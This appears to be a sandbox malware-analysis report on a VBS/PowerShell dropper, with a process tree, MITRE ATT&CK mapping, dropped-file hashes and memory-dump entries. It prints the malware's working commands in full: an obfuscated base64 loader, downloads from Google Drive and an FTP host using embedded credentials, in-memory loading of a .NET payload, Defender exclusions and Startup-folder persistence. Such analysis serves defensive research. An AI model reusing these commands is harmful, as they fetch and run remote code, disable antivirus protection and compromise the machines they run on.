ЉYwBzШḆЉGIШḆЉaШḆЉШḆЉ3ШḆЉEMШḆЉUШḆЉШḆЉwШḆЉEkШḆЉZgBQШḆЉGQШḆЉQQШḆЉyШḆЉDEШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcABWAGkAcwAkACgAIAA9ACAAUABwAFYAaQBzACQAewAgACkAbwBHAGYARABRACQAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAbwBHAGYARABRACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAFAAcABWAGkAcwAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAEgAQgBaAGoARgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABIAEIAWgBqAEYAJAAgADsA';$RIyag = $qCybe.replace('ШḆЉ' , 'A') ;$gsoKZ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $RIyag ) ); $gsoKZ = $gsoKZ[-1..-$gsoKZ.Length] -join '';$gsoKZ = $gsoKZ.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs');powershell $gsoKZ
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $FjZBH = $host.Version.Major.Equals(2) ;if ($FjZBH) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($QDfGo) {$siVpP = ($siVpP + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$uHUso = (New-Object Net.WebClient);$uHUso.Encoding = [System.Text.Encoding]::UTF8;$uHUso.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$GAwZn;$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$lqVmC.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$GAwZn = $lqVmC.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lqVmC.dispose();$lqVmC = (New-Object Net.WebClient);$lqVmC.Encoding = [System.Text.Encoding]::UTF8;$GAwZn = $lqVmC.DownloadString( $GAwZn );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs';[Byte[]] $xXzmx = [System.Convert]::FromBase64String( $GAwZn.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $xXzmx ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '22%313bca6200038df551e4b88f65714a6a22%=v&daolnwod=ecruos&txt.4202.80.7072%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.80.7022%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.6c6e594602ef-641a-63e4-b3cf-e3b80a68/JwRKqupA/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:848
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:4004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1852
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:5072
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:4836
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:1904
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2992
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:1484
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2400
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:4832
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:4284
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:4076
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:1612
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:1700
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2988
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:3856
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2044
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2336
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:3464
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:3664
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:4272
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:4636
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:1204
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:4348
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:3672
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:336
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2000
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2332
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2240
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:1384
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:3536
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2636
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:60
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2008
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:440
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2416
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:4392
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:3548
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2520
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:3232
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:912
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2760
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:3880
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:4544
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\c148847fa77cb45993ded6736c2412bae37c4abb497ac401ffe48ef59172304e.vbs"
      4⤵
      PID:2400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
9aa4b6824063d23637abfd4d44c763d4

SHA1
65cb227d8ba2538e47ae67c22f972b0d207f415d

SHA256
50c6738df99274e28e7b3e8e4391c9e6fcb528579e4fe4d2755bb5f9a9a71987

SHA512
430da834b97061576696fc80785946acba4a4f958c5c6788f4ad4ea6df5287ed6a97f104f598b2c3bbfca38e0081b2e6b721ba7d69e77f8c1678ce2747bd50cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.txt

Filesize
355B

MD5
967eb55005b30c47f32376bc2bcfe01d

SHA1
4e0ef0d27139685f669c2d209517bbb76649a10e

SHA256
1b5d83bb7b160cf7af02f1fcd87dc47a851495339e98e1f3c369337c6b96a31f

SHA512
6d24c54302e9e9f3d8702037a83185279acac8fae1e93b798ad480148f63bee1a34d90c5c9a0da4c1571ed3d4b1d69033137027aac4b9ace9134f9a3a4546062

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klu4fjdh.imj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3652-22-0x00000144442B0000-0x00000144442BA000-memory.dmp

Filesize
40KB

Download
memory/3844-0-0x00007FFACED13000-0x00007FFACED15000-memory.dmp

Filesize
8KB

Download
memory/3844-1-0x0000028BDD3A0000-0x0000028BDD3C2000-memory.dmp

Filesize
136KB

Download
memory/3844-11-0x00007FFACED10000-0x00007FFACF7D1000-memory.dmp

Filesize
10.8MB

Download
memory/3844-12-0x00007FFACED10000-0x00007FFACF7D1000-memory.dmp

Filesize
10.8MB

Download
memory/3844-60-0x00007FFACED13000-0x00007FFACED15000-memory.dmp

Filesize
8KB

Download
memory/3844-61-0x00007FFACED10000-0x00007FFACF7D1000-memory.dmp

Filesize
10.8MB

Download